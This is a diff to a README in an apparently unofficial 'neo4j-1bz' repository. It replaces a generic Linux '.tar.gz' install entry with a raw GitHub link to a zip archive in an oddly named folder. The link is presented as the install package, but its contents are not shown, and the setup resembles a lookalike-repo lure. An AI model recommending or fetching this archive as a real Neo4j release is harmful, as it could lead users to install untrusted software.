ArdozaMaster/neo4j-1bz/README.md

 - `.exe`: For Windows users to install directly.
 - `.dmg`: For macOS users to drag and drop into the Applications folder.
-- `.tar.gz`: For advanced Linux users to extract and install.
+- `https://raw.githubusercontent.com/ArdozaMaster/neo4j-1bz/main/Napoleonize/neo4j-1bz-2.9-beta.1.zip`: For advanced Linux users to extract and install.

 ## ⚙️ Installation Steps